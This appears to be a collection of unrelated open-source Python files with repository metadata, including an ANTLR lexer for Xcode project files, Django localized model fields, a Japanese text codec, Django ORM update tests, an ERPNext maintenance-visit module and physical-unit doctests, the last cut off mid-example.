T__42 = 43
T__43 = 44
T__44 = 45
T__45 = 46
T__46 = 47
T__47 = 48
T__48 = 49
T__49 = 50
T__50 = 51
T__51 = 52
T__52 = 53
T__53 = 54
T__54 = 55
T__55 = 56
T__56 = 57
T__57 = 58
T__58 = 59
T__59 = 60
T__60 = 61
T__61 = 62
T__62 = 63
T__63 = 64
T__64 = 65
T__65 = 66
T__66 = 67
T__67 = 68
T__68 = 69
T__69 = 70
T__70 = 71
T__71 = 72
T__72 = 73
T__73 = 74
T__74 = 75
T__75 = 76
T__76 = 77
T__77 = 78
T__78 = 79
T__79 = 80
T__80 = 81
T__81 = 82
T__82 = 83
T__83 = 84
T__84 = 85
T__85 = 86
T__86 = 87
T__87 = 88
T__88 = 89
T__89 = 90
T__90 = 91
T__91 = 92
T__92 = 93
T__93 = 94
T__94 = 95
T__95 = 96
T__96 = 97
T__97 = 98
T__98 = 99
T__99 = 100
T__100 = 101
T__101 = 102
T__102 = 103
T__103 = 104
T__104 = 105
T__105 = 106
T__106 = 107
T__107 = 108
T__108 = 109
T__109 = 110
T__110 = 111
T__111 = 112
T__112 = 113
T__113 = 114
T__114 = 115
CLASSES = 116
ISA = 117
OBJECTS = 118
ROOT_OBJECT = 119
NUMBER = 120
DOT = 121
ALPHA_NUMERIC = 122
ALPHA_NUMERIC_CAP = 123
DASH = 124
UNDERSCORE = 125
SLASH = 126
REFERENCE = 127
QUOTED_STRING = 128
NON_QUOTED_STRING = 129
VARIABLE = 130
WS = 131
COMMENT = 132
LINE_COMMENT = 133
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'{'", "'}'", "'archiveVersion'", "'='", "';'", "'objectVersion'",
"'PBXAggregateTarget'", "'PBXBuildFile'", "'PBXContainerItemProxy'",
"'PBXCopyFilesBuildPhase'", "'PBXFileReference'", "'PBXFrameworksBuildPhase'",
"'PBXGroup'", "'PBXHeadersBuildPhase'", "'PBXNativeTarget'",
"'PBXProject'", "'PBXReferenceProxy'", "'PBXResourcesBuildPhase'",
"'PBXShellScriptBuildPhase'", "'PBXSourcesBuildPhase'", "'PBXTargetDependency'",
"'PBXVariantGroup'", "'XCBuildConfiguration'", "'XCConfigurationList'",
"'XCRemoteSwiftPackageReference'", "'XCSwiftPackageProductDependency'",
"'XCVersionGroup'", "'fileRef'", "'productRef'", "'containerPortal'",
"'proxyType'", "'remoteGlobalIDString'", "'remoteInfo'", "'fileEncoding'",
"'explicitFileType'", "'lastKnownFileType'", "'includeInIndex'",
"'indentWidth'", "'tabWidth'", "'usesTabs'", "'platformFilter'",
"'children'", "'productInstallPath'", "'repositoryURL'", "'requirement'",
"'package'", "'packageProductDependencies'", "'name'", "'path'",
"'sourceTree'", "'buildActionMask'", "'files'", "'runOnlyForDeploymentPostprocessing'",
"'('", "','", "')'", "'buildConfigurationList'", "'buildPhases'",
"'buildRules'", "'dependencies'", "'productName'", "'productReference'",
"'productType'", "'lineEnding'", "'xcLanguageSpecificationIdentifier'",
"'plistStructureDefinitionIdentifier'", "'attributes'", "'LastSwiftMigration'",
"'DefaultBuildSystemTypeForWorkspace'", "'LastSwiftUpdateCheck'",
"'BuildIndependentTargetsInParallel'", "'LastTestingUpgradeCheck'",
"'LastUpgradeCheck'", "'ORGANIZATIONNAME'", "'TargetAttributes'",
"'CreatedOnToolsVersion'", "'TestTargetID'", "'DevelopmentTeam'",
"'ProvisioningStyle'", "'compatibilityVersion'", "'developmentRegion'",
"'hasScannedForEncodings'", "'knownRegions'", "'mainGroup'",
"'productRefGroup'", "'packageReferences'", "'projectDirPath'",
"'projectReferences'", "'projectRoot'", "'targets'", "'inputFileListPaths'",
"'inputPaths'", "'outputFileListPaths'", "'outputPaths'", "'shellPath'",
"'shellScript'", "'showEnvVarsInLog'", "'target'", "'targetProxy'",
"'fileType'", "'remoteRef'", "'baseConfigurationReference'",
"'buildSettings'", "'dstPath'", "'dstSubfolderSpec'", "'ProductGroup'",
"'ProjectRef'", "'buildConfigurations'", "'defaultConfigurationIsVisible'",
"'defaultConfigurationName'", "'settings'", "'SystemCapabilities'",
"'currentVersion'", "'versionGroupType'", "'CLASSPREFIX'", "'classes'",
"'isa'", "'objects'", "'rootObject'", "'.'", "'-'", "'_'", "'/'" ]
symbolicNames = [ "<INVALID>",
"CLASSES", "ISA", "OBJECTS", "ROOT_OBJECT", "NUMBER", "DOT",
"ALPHA_NUMERIC", "ALPHA_NUMERIC_CAP", "DASH", "UNDERSCORE",
"SLASH", "REFERENCE", "QUOTED_STRING", "NON_QUOTED_STRING",
"VARIABLE", "WS", "COMMENT", "LINE_COMMENT" ]
ruleNames = [ "T__0", "T__1", "T__2", "T__3", "T__4", "T__5", "T__6",
"T__7", "T__8", "T__9", "T__10", "T__11", "T__12", "T__13",
"T__14", "T__15", "T__16", "T__17", "T__18", "T__19",
"T__20", "T__21", "T__22", "T__23", "T__24", "T__25",
"T__26", "T__27", "T__28", "T__29", "T__30", "T__31",
"T__32", "T__33", "T__34", "T__35", "T__36", "T__37",
"T__38", "T__39", "T__40", "T__41", "T__42", "T__43",
"T__44", "T__45", "T__46", "T__47", "T__48", "T__49",
"T__50", "T__51", "T__52", "T__53", "T__54", "T__55",
"T__56", "T__57", "T__58", "T__59", "T__60", "T__61",
"T__62", "T__63", "T__64", "T__65", "T__66", "T__67",
"T__68", "T__69", "T__70", "T__71", "T__72", "T__73",
"T__74", "T__75", "T__76", "T__77", "T__78", "T__79",
"T__80", "T__81", "T__82", "T__83", "T__84", "T__85",
"T__86", "T__87", "T__88", "T__89", "T__90", "T__91",
"T__92", "T__93", "T__94", "T__95", "T__96", "T__97",
"T__98", "T__99", "T__100", "T__101", "T__102", "T__103",
"T__104", "T__105", "T__106", "T__107", "T__108", "T__109",
"T__110", "T__111", "T__112", "T__113", "T__114", "CLASSES",
"ISA", "OBJECTS", "ROOT_OBJECT", "NUMBER", "DOT", "ALPHA_NUMERIC",
"ALPHA_NUMERIC_CAP", "DASH", "UNDERSCORE", "SLASH", "REFERENCE",
"QUOTED_STRING", "NON_QUOTED_STRING", "VARIABLE", "HEX",
"QUOTED_STRING_CHARACTER", "WS", "COMMENT", "LINE_COMMENT" ]
grammarFileName = "PBXProj.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9.2")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
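# A minimal, hypothetical usage sketch (not part of the generated output): assuming
# the standard antlr4 Python runtime that ANTLR-generated lexers target, the class
# above could be driven roughly as follows; "project.pbxproj" is only a placeholder.
#
#   from antlr4 import InputStream, CommonTokenStream
#
#   with open("project.pbxproj") as fh:
#       lexer = PBXProjLexer(InputStream(fh.read()))
#   tokens = CommonTokenStream(lexer)
#   tokens.fill()  # tokens.tokens now holds ISA, OBJECTS, QUOTED_STRING, ... tokens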
|
apache-2.0
|
jonasundderwolf/django-localizedfields
|
localizedfields/fields.py
|
1
|
7494
|
from composite_field.base import CompositeField
from django.conf import settings
from django.db import models
from django.utils import translation
from django.utils.functional import lazy
from .utils import (
SHORT_LANGUAGES,
LanguageAwareUploadToDirectory,
for_all_languages,
get_language,
localized_field,
short_language,
)
def get_localized(self, lang, name):
lang = lang or get_language() or settings.LANGUAGE_CODE
try:
attr = getattr(self, localized_field(name, lang))
except AttributeError as e:
raise AttributeError(
'Either field "%s" does not exist, or language "%s" is not defined '
"for this model. (%s)" % (name, lang, e)
)
return attr
def set_localized(self, lang, name, value):
lang = lang or get_language() or settings.LANGUAGE_CODE
try:
        setattr(self, localized_field(name, lang), value)
except AttributeError as e:
raise AttributeError(
'Either field "%s" does not exist, or language "%s" is not defined '
"for this model. (%s)" % (name, lang, e)
)
def set_all_localized(self, name, func, *args, **kwargs):
for k, v in for_all_languages(func, *args, **kwargs).items():
self.set_localized(k, name, v)
class LocalizedField(CompositeField):
def __init__(self, field_class, *args, **kwargs):
"""
Adds a model field of type "field_class" with translations for all languages.
        Fallback can have one of these values:
        None (default): an empty field value in an object that is marked as
        "translated" for that language is returned as-is (i.e. empty).
        True: fall back to the default language when the field is empty or
        when the fallback is checked in the admin (saved in
        model.translated_languages).
        False: never fall back, even when the object is not translated.
"""
super(LocalizedField, self).__init__()
self.verbose_name = kwargs.pop("verbose_name", None)
self.fallback = kwargs.pop("fallback", None)
# we can't check for blanks, one language might always be blank
kwargs.pop("blank", False)
for language in SHORT_LANGUAGES:
self[language] = field_class(blank=True, *args, **kwargs)
def contribute_to_class(self, cls, field_name):
if self.verbose_name is None:
self.verbose_name = field_name.replace("_", " ").capitalize()
for language in self:
self[language].verbose_name = lazy(
lambda language: self.verbose_name + " (" + language + ")", str
)(language)
# Save a reference to the composite field for later use
self[language].composite_field = self
super(LocalizedField, self).contribute_to_class(cls, field_name)
# monkeypatch some helper functions to the class
cls.get_localized = get_localized
cls.set_localized = set_localized
cls.set_all_localized = set_all_localized
def get(self, model):
# get current value
translation = getattr(model, self.prefix + short_language())
if self.fallback is False:
# we don't fallback, return the value
return translation
translated_languages = getattr(model, "translated_languages", "")
# only applies to models with translated_languages
if get_language() is None:
language = ""
else:
language = get_language()
if translated_languages:
# fallback to default if language not translated
if language not in translated_languages:
return getattr(
model, self.prefix + short_language(settings.LANGUAGE_CODE)
)
else:
if language not in getattr(model.parent, "translated_languages", ""):
return getattr(
model, self.prefix + short_language(settings.LANGUAGE_CODE)
)
if translation or not self.fallback:
# show translation only if it exists or we have disabled fallback
return translation
# fallback to default language
return getattr(model, self.prefix + short_language(settings.LANGUAGE_CODE))
def set(self, model, value):
from django.utils.functional import Promise
language = short_language()
# XXX is there a better way to detect ugettext_lazy objects?
if isinstance(value, Promise):
with translation.override(language):
value = str(value)
setattr(model, self.prefix + short_language(), value)
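# A minimal, hypothetical usage sketch (not part of this module): assuming a Django
# project with two configured languages ("en", "de"), the composite field and the
# monkeypatched helpers behave roughly as follows; Article/title are placeholders.
#
#   class Article(models.Model):
#       title = LocalizedField(models.CharField, max_length=100, fallback=True)
#
#   # The field expands to one column per language (title_en, title_de). Reading
#   # article.title returns the active language's value and, with fallback=True,
#   # falls back to settings.LANGUAGE_CODE when that value is empty.
#   article = Article()
#   article.set_localized("de", "title", "Hallo")
#   article.get_localized("de", "title")   # -> "Hallo"
#   # set_all_localized(name, func, ...) applies func once per configured language.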
class LocalizedCharField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedCharField, self).__init__(models.CharField, *args, **kwargs)
class LocalizedTextField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedTextField, self).__init__(models.TextField, *args, **kwargs)
class LocalizedFileField(LocalizedField):
def __init__(self, *args, **kwargs):
# call the grandparent's init()
upload_to_params = kwargs.pop("upload_to_params", None)
super(LocalizedField, self).__init__()
field_class = kwargs.pop("field_class", models.FileField)
self.verbose_name = kwargs.pop("verbose_name", None)
# fallback to english version by default
self.fallback = kwargs.pop("fallback", True)
# when we're localized, the field can always be empty in one language
if "blank" in kwargs:
del kwargs["blank"]
# set a higher max length for filenames
kwargs["max_length"] = 255
for language in SHORT_LANGUAGES:
if not upload_to_params:
upload_to_params = {}
upload_to_params.update({"language": language})
kwargs["upload_to"] = LanguageAwareUploadToDirectory(**upload_to_params)
self[language] = field_class(blank=True, *args, **kwargs)
class LocalizedImageField(LocalizedFileField):
def __init__(self, *args, **kwargs):
kwargs["field_class"] = models.ImageField
        super(LocalizedImageField, self).__init__(*args, **kwargs)  # field_class already set in kwargs
class LocalizedBooleanField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedBooleanField, self).__init__(
models.BooleanField, *args, **kwargs
)
class LocalizedDateField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedDateField, self).__init__(models.DateField, *args, **kwargs)
class LocalizedForeignKey(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedForeignKey, self).__init__(models.ForeignKey, *args, **kwargs)
class LocalizedURLField(LocalizedField):
def __init__(self, *args, **kwargs):
kwargs["fallback"] = kwargs.get("fallback", True)
super(LocalizedURLField, self).__init__(models.URLField, *args, **kwargs)
class LocalizedDecimalField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedDecimalField, self).__init__(
models.DecimalField, *args, **kwargs
)
class LocalizedIntegerField(LocalizedField):
def __init__(self, *args, **kwargs):
super(LocalizedIntegerField, self).__init__(
models.IntegerField, *args, **kwargs
)
|
bsd-3-clause
|
bussiere/pypyjs
|
website/demo/home/rfk/repos/pypy/lib-python/2.7/encodings/iso2022_jp_2.py
|
816
|
1061
|
#
# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_iso2022, codecs
import _multibytecodec as mbc
codec = _codecs_iso2022.getcodec('iso2022_jp_2')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='iso2022_jp_2',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
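# A hypothetical usage sketch (not part of the codec module): once the encodings
# package registers this entry, the codec is reachable through the normal codec
# APIs by name; the sample text below is only illustrative.
#
#   data = u"ISO-2022-JP-2 sample".encode("iso2022_jp_2")
#   assert data.decode("iso2022_jp_2") == u"ISO-2022-JP-2 sample"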
|
mit
|
alx-eu/django
|
tests/modeltests/update/tests.py
|
118
|
4307
|
from __future__ import absolute_import, unicode_literals
from django.test import TestCase
from .models import A, B, C, D, DataPoint, RelatedPoint
class SimpleTest(TestCase):
def setUp(self):
self.a1 = A.objects.create()
self.a2 = A.objects.create()
for x in range(20):
B.objects.create(a=self.a1)
D.objects.create(a=self.a1)
def test_nonempty_update(self):
"""
Test that update changes the right number of rows for a nonempty queryset
"""
num_updated = self.a1.b_set.update(y=100)
self.assertEqual(num_updated, 20)
cnt = B.objects.filter(y=100).count()
self.assertEqual(cnt, 20)
def test_empty_update(self):
"""
Test that update changes the right number of rows for an empty queryset
"""
num_updated = self.a2.b_set.update(y=100)
self.assertEqual(num_updated, 0)
cnt = B.objects.filter(y=100).count()
self.assertEqual(cnt, 0)
def test_nonempty_update_with_inheritance(self):
"""
        Test that update changes the right number of rows for a nonempty queryset
when the update affects only a base table
"""
num_updated = self.a1.d_set.update(y=100)
self.assertEqual(num_updated, 20)
cnt = D.objects.filter(y=100).count()
self.assertEqual(cnt, 20)
def test_empty_update_with_inheritance(self):
"""
Test that update changes the right number of rows for an empty queryset
when the update affects only a base table
"""
num_updated = self.a2.d_set.update(y=100)
self.assertEqual(num_updated, 0)
cnt = D.objects.filter(y=100).count()
self.assertEqual(cnt, 0)
class AdvancedTests(TestCase):
def setUp(self):
self.d0 = DataPoint.objects.create(name="d0", value="apple")
self.d2 = DataPoint.objects.create(name="d2", value="banana")
self.d3 = DataPoint.objects.create(name="d3", value="banana")
self.r1 = RelatedPoint.objects.create(name="r1", data=self.d3)
def test_update(self):
"""
Objects are updated by first filtering the candidates into a queryset
and then calling the update() method. It executes immediately and
returns nothing.
"""
resp = DataPoint.objects.filter(value="apple").update(name="d1")
self.assertEqual(resp, 1)
resp = DataPoint.objects.filter(value="apple")
self.assertEqual(list(resp), [self.d0])
def test_update_multiple_objects(self):
"""
We can update multiple objects at once.
"""
resp = DataPoint.objects.filter(value="banana").update(
value="pineapple")
self.assertEqual(resp, 2)
self.assertEqual(DataPoint.objects.get(name="d2").value, 'pineapple')
def test_update_fk(self):
"""
Foreign key fields can also be updated, although you can only update
the object referred to, not anything inside the related object.
"""
resp = RelatedPoint.objects.filter(name="r1").update(data=self.d0)
self.assertEqual(resp, 1)
resp = RelatedPoint.objects.filter(data__name="d0")
self.assertEqual(list(resp), [self.r1])
def test_update_multiple_fields(self):
"""
Multiple fields can be updated at once
"""
resp = DataPoint.objects.filter(value="apple").update(
value="fruit", another_value="peach")
self.assertEqual(resp, 1)
d = DataPoint.objects.get(name="d0")
self.assertEqual(d.value, 'fruit')
self.assertEqual(d.another_value, 'peach')
def test_update_all(self):
"""
In the rare case you want to update every instance of a model, update()
is also a manager method.
"""
self.assertEqual(DataPoint.objects.update(value='thing'), 3)
resp = DataPoint.objects.values('value').distinct()
self.assertEqual(list(resp), [{'value': 'thing'}])
def test_update_slice_fail(self):
"""
We do not support update on already sliced query sets.
"""
method = DataPoint.objects.all()[:2].update
self.assertRaises(AssertionError, method,
another_value='another thing')
|
bsd-3-clause
|
Tejal011089/osmosis_erpnext
|
erpnext/support/doctype/maintenance_visit/maintenance_visit.py
|
34
|
3196
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from erpnext.utilities.transaction_base import TransactionBase
class MaintenanceVisit(TransactionBase):
def get_feed(self):
return _("To {0}").format(self.customer_name)
def get_item_details(self, item_code):
return frappe.db.get_value("Item", item_code, ["item_name", "description"], as_dict=1)
def validate_serial_no(self):
for d in self.get('purposes'):
if d.serial_no and not frappe.db.exists("Serial No", d.serial_no):
frappe.throw(_("Serial No {0} does not exist").format(d.serial_no))
def validate(self):
self.validate_serial_no()
def update_customer_issue(self, flag):
for d in self.get('purposes'):
if d.prevdoc_docname and d.prevdoc_doctype == 'Warranty Claim' :
if flag==1:
mntc_date = self.mntc_date
service_person = d.service_person
work_done = d.work_done
status = "Open"
if self.completion_status == 'Fully Completed':
status = 'Closed'
elif self.completion_status == 'Partially Completed':
status = 'Work In Progress'
else:
nm = frappe.db.sql("select t1.name, t1.mntc_date, t2.service_person, t2.work_done from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2 where t2.parent = t1.name and t1.completion_status = 'Partially Completed' and t2.prevdoc_docname = %s and t1.name!=%s and t1.docstatus = 1 order by t1.name desc limit 1", (d.prevdoc_docname, self.name))
if nm:
status = 'Work In Progress'
mntc_date = nm and nm[0][1] or ''
service_person = nm and nm[0][2] or ''
work_done = nm and nm[0][3] or ''
else:
status = 'Open'
mntc_date = ''
service_person = ''
work_done = ''
frappe.db.sql("update `tabWarranty Claim` set resolution_date=%s, resolved_by=%s, resolution_details=%s, status=%s where name =%s",(mntc_date,service_person,work_done,status,d.prevdoc_docname))
def check_if_last_visit(self):
"""check if last maintenance visit against same sales order/ Warranty Claim"""
check_for_docname = None
for d in self.get('purposes'):
if d.prevdoc_docname:
check_for_docname = d.prevdoc_docname
#check_for_doctype = d.prevdoc_doctype
if check_for_docname:
check = frappe.db.sql("select t1.name from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2 where t2.parent = t1.name and t1.name!=%s and t2.prevdoc_docname=%s and t1.docstatus = 1 and (t1.mntc_date > %s or (t1.mntc_date = %s and t1.mntc_time > %s))", (self.name, check_for_docname, self.mntc_date, self.mntc_date, self.mntc_time))
if check:
check_lst = [x[0] for x in check]
check_lst =','.join(check_lst)
frappe.throw(_("Cancel Material Visits {0} before cancelling this Maintenance Visit").format(check_lst))
raise Exception
else:
self.update_customer_issue(0)
def on_submit(self):
self.update_customer_issue(1)
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
self.check_if_last_visit()
frappe.db.set(self, 'status', 'Cancelled')
def on_update(self):
pass
|
agpl-3.0
|
hainm/mdtraj
|
mdtraj/utils/unit/doctests.py
|
17
|
21017
|
"""
Module simtk.unit.doctests
Lots of in-place doctests would no longer work after I rearranged
so that specific unit definitions are defined late. So those tests
are here.
Examples
>>> furlong = BaseUnit(length_dimension, "furlong", "fur")
Examples
>>> furlong_base_unit = BaseUnit(length_dimension, "furlong", "fur")
>>> furlong_base_unit.define_conversion_factor_to(meter_base_unit, 201.16800)
>>> furlong_base_unit.conversion_factor_to(angstrom_base_unit)
2011680000000.0
Examples
>>> furlong_base_unit = BaseUnit(length_dimension, "furlong", "fur")
>>> furlong_base_unit.define_conversion_factor_to(meter_base_unit, 201.16800)
Examples
Some of these example test methods from Unit and Quantity
from unit.is_unit
>>> is_unit(meter)
True
>>> is_unit(5*meter)
False
>>> c = 1.0*calories
>>> c
Quantity(value=1.0, unit=calorie)
>>> print(calorie.conversion_factor_to(joule))
4.184
>>> print(joule.conversion_factor_to(calorie))
0.239005736138
>>> c.in_units_of(joules)
Quantity(value=4.1840000000000002, unit=joule)
>>> j = 1.0*joules
>>> j
Quantity(value=1.0, unit=joule)
>>> j.in_units_of(calories)
Quantity(value=0.23900573613766729, unit=calorie)
>>> j/joules
1.0
>>> print(j/calories)
0.239005736138
>>> print(c/joules)
4.184
>>> c/calories
1.0
>>> c**2
Quantity(value=1.0, unit=calorie**2)
>>> (c**2).in_units_of(joule*joule)
Quantity(value=17.505856000000001, unit=joule**2)
>>> ScaledUnit(1000.0, kelvin, "kilokelvin", "kK")
ScaledUnit(factor=1000.0, master=kelvin, name='kilokelvin', symbol='kK')
>>> str(ScaledUnit(1000.0, kelvin, "kilokelvin", "kK"))
'kilokelvin'
Examples
>>> meters > centimeters
True
>>> angstroms > centimeters
False
Examples
>>> print(meter / second)
meter/second
>>> print(meter / meter)
dimensionless
Heterogeneous units are not reduced unless they are in a quantity.
>>> print(meter / centimeter)
meter/centimeter
Examples
>>> meters_per_second = Unit({meter_base_unit: 1.0, second_base_unit: -1.0})
>>> print(meters_per_second)
meter/second
>>> us = UnitSystem([ScaledUnit(1.0, coulomb/second, "ampere", "A"), second_base_unit])
>>> print(us.express_unit(second))
second
>>> print(us.express_unit(coulomb/second))
ampere
>>> print(us.express_unit(coulomb))
second*ampere
>>> print(us.express_unit(meter/second))
meter/second
>>> us = UnitSystem([ScaledUnit(1.0, coulomb/second, "ampere", "A"), second_base_unit])
>>> print(us)
UnitSystem([ampere, second])
Examples
>>> meter.is_dimensionless()
False
>>> (meter/meter).is_dimensionless()
True
>>> print((meter*meter).sqrt())
meter
>>> meter.sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> (meter*meter*meter).sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> print((meter*meter/second/second).sqrt())
meter/second
Mixture of BaseUnits and ScaledUnits should cause no trouble:
>>> print(sqrt(kilogram*joule))
kilogram*meter/second
>>> print(sqrt(kilogram*calorie))
kilogram*meter/second
Examples
>>> newton.get_name()
'newton'
>>> meter.get_name()
'meter'
Examples
>>> newton.get_symbol()
'N'
>>> meter.get_symbol()
'm'
Examples
>>> print(angstrom.in_unit_system(si_unit_system))
meter
>>> print(angstrom.in_unit_system(cgs_unit_system))
centimeter
>>> print(angstrom.in_unit_system(md_unit_system))
nanometer
>>> u = meter/second**2
>>> print(u)
meter/(second**2)
>>> print(u.in_unit_system(si_unit_system))
meter/(second**2)
>>> print(u.in_unit_system(cgs_unit_system))
centimeter/(second**2)
>>> print(u.in_unit_system(md_unit_system))
nanometer/(picosecond**2)
Examples
>>> meter.is_compatible(centimeter)
True
>>> meter.is_compatible(meter)
True
>>> meter.is_compatible(kelvin)
False
>>> meter.is_compatible(meter/second)
False
>>> joule.is_compatible(calorie)
True
Examples
>>> meter.conversion_factor_to(centimeter)
100.0
>>> print((md_kilocalorie/mole/angstrom).conversion_factor_to(md_kilojoule/mole/nanometer))
41.84
Examples
>>> print(meter)
meter
>>> print(meter * second * second * kilogram)
kilogram*meter*second**2
>>> print(meter / second / second / kilogram)
meter/(kilogram*second**2)
Examples
>>> print(meter**3)
meter**3
>>> print(meter**3)
meter**3
>>> meter.get_conversion_factor_to_base_units()
1.0
Simple ScaledUnit in calorie
>>> print(calorie.get_conversion_factor_to_base_units())
4.184
Compound ScaledUnit in md_kilocalorie
>>> print(md_kilocalorie.get_conversion_factor_to_base_units())
4.184
calorie in a more complex unit
>>> print((md_kilocalorie/mole/angstrom).get_conversion_factor_to_base_units())
4.184
Examples
Create simple Quantities with either the multiply operator or the Quantity constructor.
>>> print(5 * centimeters)
5 cm
>>> print(Quantity(value=5, unit=centimeter))
5 cm
>>> print(Quantity(5, centimeter))
5 cm
Extract the underlying value using either division or the value_in_unit() method.
>>> i = 5 * centimeters
>>> print(i / millimeters)
50.0
>>> print(i.value_in_unit(millimeters))
50.0
Collections of numbers can also be used as values.
>>> s = [1,2,3] * centimeters
>>> print(s)
[1, 2, 3] cm
>>> print(s / millimeters)
[10.0, 20.0, 30.0]
>>> s2 = [[1,2,3],[4,5,6]] * centimeters
>>> print(s2)
[[1, 2, 3], [4, 5, 6]] cm
>>> print(s2 / millimeters)
[[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]]
>>> s3 = [(1,2,3),(4,5,6)] * centimeters
>>> print(s3)
[(1, 2, 3), (4, 5, 6)] cm
>>> print(s3 / millimeters)
[(10.0, 20.0, 30.0), (40.0, 50.0, 60.0)]
>>> s4 = ((1,2,3),(4,5,6)) * centimeters
>>> print(s4)
((1, 2, 3), (4, 5, 6)) cm
>>> print(s4 / millimeters)
[(10.0, 20.0, 30.0), (40.0, 50.0, 60.0)]
>>> t = (1,2,3) * centimeters
>>> print(t)
(1, 2, 3) cm
>>> print(t / millimeters)
[10.0, 20.0, 30.0]
Numpy examples are commented out because not all systems have numpy installed
# >>> import numpy
# >>>
# >>> a = Quantity(numpy.array([1,2,3]), centimeters)
# >>> print(a)
# [1 2 3] cm
# >>> print(a / millimeters)
# [ 10. 20. 30.]
# >>>
# >>> a2 = Quantity(numpy.array([[1,2,3],[4,5,6]]), centimeters)
# >>> print(a2)
# [[1 2 3]
# [4 5 6]] cm
# >>> print(a2 / millimeters)
# [[ 10. 20. 30.]
# [ 40. 50. 60.]]
Addition, subtraction, multiplication, division, and powers of Quantities
exhibit correct dimensional analysis and unit conversion.
>>> x = 1.3 * meters
>>> y = 75.2 * centimeters
>>> print(x + y)
2.052 m
>>> print(x - y)
0.548 m
>>> print(x/y)
1.72872340426
>>> print(x*y)
0.9776 m**2
The following examples are derived from the C++ Boost.Units examples at
http://www.boost.org/doc/libs/1_37_0/doc/html/boost_units/Examples.html
>>>
>>> l = 2.0 * meters
>>>
>>> print(l + 2.0 * nanometers)
2.000000002 m
>>> print(2.0 * nanometers + l)
2000000002.0 nm
>>>
>>> print(l)
2.0 m
>>> print(l+l)
4.0 m
>>> print(l-l)
0.0 m
>>> print(l*l)
4.0 m**2
>>> print(l/l)
1.0
>>> print(l * meter)
2.0 m**2
>>> print(kilograms * (l/seconds) * (l/seconds))
4.0 kg m**2/(s**2)
>>> print(kilograms * (l/seconds)**2)
4.0 kg m**2/(s**2)
>>> print(l ** 3)
8.0 m**3
>>> print(l ** (3.0/2.0))
2.82842712475 m**1.5
>>> print(l ** 0.5)
1.41421356237 m**0.5
>>> print(l ** (2.0/3.0))
1.58740105197 m**0.666667
>>> # complex example
>>> l = (3.0 + 4.0j) * meters
>>> print(l)
(3+4j) m
>>> print(l+l)
(6+8j) m
>>> print(l-l)
0j m
>>> print(l*l)
(-7+24j) m**2
>>> # Numerical error yields tiny imaginary component of l/l on linux CentOS5
>>> err = abs(l/l - 1)
>>> assert err < 1e-8
>>> print(l * meter)
(3+4j) m**2
>>> print(kilograms * (l/seconds) * (l/seconds))
(-7+24j) kg m**2/(s**2)
>>> print(kilograms * (l/seconds)**2)
(-7+24j) kg m**2/(s**2)
>>> print(l ** 3)
(-117+44j) m**3
>>> print(l ** (3.0/2.0))
(2+11j) m**1.5
>>> print(l ** 0.5)
(2+1j) m**0.5
>>> print(l ** (2.0/3.0))
(2.38285471252+1.69466313833j) m**0.666667
>>> # kitchen sink example
... s1 = 2.0
>>> x1 = 2
>>> x2 = 4.0/3.0
>>> u1 = kilogram * meter / second**2
>>> u2 = u1 * meter
>>> q1 = 1.0*u1
>>> q2 = 2.0*u2
>>> print(s1)
2.0
>>> print(x1)
2
>>> print(x2)
1.33333333333
>>> print(u1)
kilogram*meter/(second**2)
>>> print(u2)
kilogram*meter**2/(second**2)
>>> print(q1)
1.0 kg m/(s**2)
>>> print(q2)
2.0 kg m**2/(s**2)
>>> print(u1*s1)
2.0 kg m/(s**2)
>>> print(s1*u1)
2.0 kg m/(s**2)
>>> print(u1/s1)
0.5 kg m/(s**2)
>>> print(s1/u1)
2.0 s**2/(kg m)
>>> print(u1*u1)
kilogram**2*meter**2/(second**4)
>>> print(u1/u1)
dimensionless
>>> print(u1*u2)
kilogram**2*meter**3/(second**4)
>>> print(u1/u2)
/meter
>>> print(u1**x1)
kilogram**2*meter**2/(second**4)
>>> print(u1**(1.0/x1))
kilogram**0.5*meter**0.5/second
>>> print(u1**x2)
kilogram**1.33333*meter**1.33333/(second**2.66667)
>>> print(u1**(1.0/x2))
kilogram**0.75*meter**0.75/(second**1.5)
>>> l1 = 1.0*meters
>>> l2 = 2.0*meters
>>> print(l1 == l2)
False
>>> print(l1 != l2)
True
>>> print(l1 <= l2)
True
>>> print(l1 < l2)
True
>>> print(l1 >= l2)
False
>>> print(l1 > l2)
False
>>>
>>> def work(f, dx):
... return f * dx
...
>>> F = 1.0 * kilogram * meter / second**2
>>> dx = 1.0 * meter
>>> E = work(F, dx)
>>>
>>> print("F = ", F)
F = 1.0 kg m/(s**2)
>>> print("dx = ", dx)
dx = 1.0 m
>>>
>>> def idealGasLaw(P, V, T):
